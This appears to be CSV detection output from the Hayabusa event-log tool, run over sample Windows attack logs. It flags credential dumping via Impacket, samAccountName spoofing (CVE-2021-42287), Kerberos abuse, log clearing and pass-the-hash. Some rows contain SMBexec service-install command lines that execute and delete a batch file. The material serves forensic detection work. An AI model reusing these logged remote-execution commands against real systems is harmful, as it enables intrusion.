2021-12-12 20:53:31.086 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser 
dump via network share.evtx 2021-12-12 20:53:31.086 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:31.086 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:31.105 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Drivers\etc | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:31.107 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Drivers\etc\hosts | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password 
Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:31.107 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Drivers\etc | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:31.123 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Drivers\etc\hosts | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:31.139 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32 | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:31.139 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\AqdQWnLE.tmp | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential 
Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:31.139 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32 | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:31.139 +09:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,../hayabusa-rules/sigma/builtin/security/win_impacket_secretdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:31.154 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\oyCCGQai.tmp | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:31.154 +09:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,../hayabusa-rules/sigma/builtin/security/win_impacket_secretdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 21:01:18.896 +09:00,fs03vuln.offsec.lan,11,info,,File Created,Path: C:\Windows\System32\drivers\etc\hosts | Process: C:\Program Files 
(x86)\Notepad++\notepad++.exe | PID: 2592 | PGUID: A57649D1-E44F-61B5-D88F-850800000000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0040-Impact/T1565-Data manipulation/ID11-DNS hosts files modified.evtx 2021-12-13 02:57:17.006 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Evas,Security Log Cleared,User: a-jbrown,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx 2021-12-13 02:57:52.272 +09:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: lgrove | Svc: krbtgt | IP Addr: ::ffff:172.16.66.19 | Status: 0x0 | PreAuthType: 2,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx 2021-12-13 02:57:52.277 +09:00,01566s-win16-ir.threebeesco.com,4769,info,,Kerberos Service Ticket Requested,User: lgrove@THREEBEESCO.COM | Svc: 01566S-WIN16-IR$ | IP Addr: ::ffff:172.16.66.19 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx 2021-12-13 02:57:52.278 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: lgrove | Computer: - | IP Addr: 172.16.66.19 | LID: 0x738ae4,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx 2021-12-13 02:57:52.325 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: lgrove | Computer: 04246W-WIN10 | IP Addr: 172.16.66.19 | LID: 
0x738afd,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx 2021-12-13 02:57:52.372 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: lgrove | Computer: 04246W-WIN10 | IP Addr: 172.16.66.19 | LID: 0x738ce4,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx 2021-12-13 02:57:52.375 +09:00,01566s-win16-ir.threebeesco.com,4781,critical,,Suspicious Computer Account Name Change CVE-2021-42287,,../hayabusa-rules/sigma/builtin/security/win_samaccountname_spoofing_cve_2021_42287.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx 2021-12-13 02:57:52.473 +09:00,01566s-win16-ir.threebeesco.com,4768,medium,CredAccess,Possible Kerberoasting,Possible Kerberoasting Risk Activity.,../hayabusa-rules/hayabusa/default/alerts/Security/4768_KerberosTGT-Request_Kerberoasting.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx 2021-12-13 02:57:52.473 +09:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: 01566s-win16-ir | Svc: krbtgt | IP Addr: ::ffff:172.16.66.19 | Status: 0x0 | PreAuthType: 2,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx 2021-12-13 02:57:52.497 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: lgrove | Computer: 04246W-WIN10 | IP Addr: 172.16.66.19 | LID: 
0x738cf9,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx 2021-12-13 02:57:52.518 +09:00,01566s-win16-ir.threebeesco.com,4769,info,,Kerberos Service Ticket Requested,User: 01566s-win16-ir@THREEBEESCO.COM | Svc: 01566S-WIN16-IR$ | IP Addr: ::ffff:172.16.66.19 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx 2021-12-13 17:21:30.767 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: WINDOWS\SYSTEM32\DRIVERS\ETC | IP Addr: 10.23.23.9 | LID: 0x8ca6e1d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1018-Remote System Discovery/ID5145-DNS hosts files access via network share.evtx 2021-12-13 17:21:30.767 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Drivers\etc\hosts:Zone.Identifier | IP Addr: 10.23.23.9 | LID: 0x8ca6e1d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1018-Remote System Discovery/ID5145-DNS hosts files access via network share.evtx 2021-12-13 17:21:30.813 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32 | IP Addr: 10.23.23.9 | LID: 
0x8ca6e1d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1018-Remote System Discovery/ID5145-DNS hosts files access via network share.evtx 2021-12-13 17:21:30.829 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: WINDOWS\SYSTEM32\DRIVERS | IP Addr: 10.23.23.9 | LID: 0x8ca6e1d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1018-Remote System Discovery/ID5145-DNS hosts files access via network share.evtx 2021-12-13 17:21:30.845 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Drivers\etc | IP Addr: 10.23.23.9 | LID: 0x8ca6e1d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1018-Remote System Discovery/ID5145-DNS hosts files access via network share.evtx 2021-12-13 21:55:45.250 +09:00,rootdc1.offsec.lan,7045,info,Persis,Service Installed,Name: BTOBTO | Path: %COMSPEC% /Q /c echo cd ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-4697-SMBexec service registration.evtx 2021-12-13 21:55:45.250 +09:00,rootdc1.offsec.lan,4697,info,Persis,Service Installed,Name: BTOBTO | Path: %COMSPEC% /Q /c echo cd ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat 
| User: admmig | SrvAccount: LocalSystem | SrvType: 0x10 | SrvStartType: 3 | LID: 0x2cff42b44,../hayabusa-rules/hayabusa/default/events/Security/4697_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-4697-SMBexec service registration.evtx 2021-12-14 23:42:48.182 +09:00,rootdc1.offsec.lan,4776,info,,NTLM Logon To Local Account,User: hack1 | Computer: attacker | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" 2021-12-14 23:42:48.182 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: hack1 | Computer: attacker | IP Addr: 10.23.123.11 | LID: 0x308fabb0c,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" 2021-12-14 23:42:48.182 +09:00,rootdc1.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" 2021-12-14 23:42:48.690 +09:00,rootdc1.offsec.lan,4776,info,,NTLM Logon To Local Account,User: hack1 | Computer: | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" 2021-12-14 23:42:48.690 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: hack1 | Computer: - | IP Addr: 10.23.123.11 | LID: 
0x308fb82ad,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" 2021-12-14 23:42:48.693 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: hack1 | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x308fb82ad,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" 2021-12-14 23:42:48.696 +09:00,rootdc1.offsec.lan,5145,high,LatMov,First Time Seen Remote Named Pipe,,../hayabusa-rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" 2021-12-14 23:42:48.908 +09:00,rootdc1.offsec.lan,4781,critical,,Suspicious Computer Account Name Change CVE-2021-42287,,../hayabusa-rules/sigma/builtin/security/win_samaccountname_spoofing_cve_2021_42287.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" 2021-12-14 23:42:48.908 +09:00,rootdc1.offsec.lan,4781,critical,,Suspicious Computer Account Name Change CVE-2021-42287,,../hayabusa-rules/sigma/builtin/security/win_samaccountname_spoofing_cve_2021_42287.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4781-Computer account renamed without a trailing $ (CVE-2021-42278).evtx 2021-12-14 23:42:49.222 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: rootdc1 | Svc: krbtgt | IP Addr: ::ffff:10.23.123.11 | Status: 0x0 | PreAuthType: 
2,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" 2021-12-14 23:42:49.222 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: rootdc1 | Svc: krbtgt | IP Addr: ::ffff:10.23.123.11 | Status: 0x0 | PreAuthType: 2,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4768-4769-Kerberos host ticket without a trailing $.evtx 2021-12-14 23:42:49.255 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: rootdc1@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.123.11 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" 2021-12-14 23:42:49.255 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: rootdc1@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.123.11 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4768-4769-Kerberos host ticket without a trailing $.evtx 2021-12-14 23:42:49.287 +09:00,rootdc1.offsec.lan,4776,info,,NTLM Logon To Local Account,User: HealthMailboxa935ecda17404b4a85c3f146fe1def56@offsec.lan | Computer: EXCHANGE01 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" 2021-12-14 23:42:49.306 
+09:00,rootdc1.offsec.lan,4776,info,,NTLM Logon To Local Account,User: HealthMailboxa935ecda17404b4a85c3f146fe1def56@offsec.lan | Computer: EXCHANGE01 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" 2021-12-14 23:42:49.309 +09:00,rootdc1.offsec.lan,4776,info,,NTLM Logon To Local Account,User: HealthMailboxa935ecda17404b4a85c3f146fe1def56@offsec.lan | Computer: EXCHANGE01 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" 2021-12-14 23:42:49.886 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmhorvath | Computer: - | IP Addr: 10.23.123.11 | LID: 0x308fd3169,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" 2021-12-14 23:42:49.889 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: admmhorvath | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x308fd3169,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" 2021-12-14 23:42:49.927 +09:00,rootdc1.offsec.lan,4697,info,Persis,Service Installed,Name: BTOBTO | Path: %COMSPEC% /Q /c echo cd ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat | User: admmhorvath | SrvAccount: LocalSystem | SrvType: 0x10 | SrvStartType: 3 | LID: 
0x308fd3169,../hayabusa-rules/hayabusa/default/events/Security/4697_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" 2021-12-14 23:42:49.937 +09:00,rootdc1.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\cmd.exe /Q /c echo cd ^> \\127.0.0.1\C$\__output 2^>^&1 > C:\Windows\TEMP\execute.bat & C:\Windows\system32\cmd.exe /Q /c C:\Windows\TEMP\execute.bat & del C:\Windows\TEMP\execute.bat | Path: C:\Windows\System32\cmd.exe | PID: 0x1624 | User: ROOTDC1$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" 2021-12-14 23:42:49.947 +09:00,rootdc1.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\cmd.exe /Q /c C:\Windows\TEMP\execute.bat | Path: C:\Windows\System32\cmd.exe | PID: 0x1138 | User: ROOTDC1$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" 2021-12-14 23:42:49.986 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: ROOTDC1$ | Share Name: \\*\IPC$ | Share Path: | IP Addr: 127.0.0.1 | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" 2021-12-14 23:42:49.989 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: ROOTDC1$ | Computer: - | IP Addr: fe80::1cae:5aa4:9d8d:106a | LID: 
0x308fd50bf,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" 2021-12-14 23:42:50.007 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: ROOTDC1$ | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 127.0.0.1 | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" 2021-12-14 23:42:50.008 +09:00,rootdc1.offsec.lan,5145,info,Collect,Network Share File Access,User: ROOTDC1$ | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: __output | IP Addr: 127.0.0.1 | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" 2021-12-14 23:42:50.008 +09:00,rootdc1.offsec.lan,5145,info,Collect,Network Share File Access,User: ROOTDC1$ | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: __output | IP Addr: 127.0.0.1 | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" 2021-12-14 23:42:50.031 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: admmhorvath | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x308fd3169,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" 
